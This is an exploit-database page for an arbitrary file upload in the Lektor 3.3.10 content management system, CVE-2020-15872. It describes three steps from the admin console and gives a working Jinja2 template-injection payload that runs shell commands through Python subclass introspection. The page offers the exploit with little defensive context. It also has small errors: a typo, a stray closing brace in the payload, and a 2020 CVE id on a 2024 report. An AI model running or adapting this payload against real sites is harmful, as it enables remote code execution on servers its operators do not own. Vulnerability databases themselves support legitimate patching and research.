Advertisement






Lektor 3.3.10 Arbitrary File upload

CVE Category Price Severity
CVE-2020-15872 CWE-434 $5,000 Critical
Author Risk Exploitation Type Date
Unknown Critical Remote 2024-03-20
CPE
cpe:/a:lektor:lektor:3.3.10
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.045 0.7

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030043

Below is a copy:

Lektor 3.3.10 Arbitrary File upload
# Exploit Title: Lektor static content management system Version: 3.3.10 Arbitrary File upload
# Date: 20/03/2024
# Exploit Author: kai6u
# Vendor Homepage: https://www.getlektor.com/
# Software Link: https://github.com/lektor/lektor/releases/tag/v3.3.10
# Version: 3.3.10
# Tested on: Ubuntu 22.04
1 ) Access to the administrator console via NW first creates a contetns.lr file containing the payload using Lektor's Add Page feature, specifying the templates directory.(Attacker also can upload to any directory.)

Payload:

{{ ''.__class__.__mro__[1].__subclasses__()[276]('whoami',shell=True,stdout=-1).communicate()[0].strip()}} }}

2 ) Create a new page by specifying the created contents.lr as template.

3 ) Use the preview function to check the sample page with the specified templates.

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.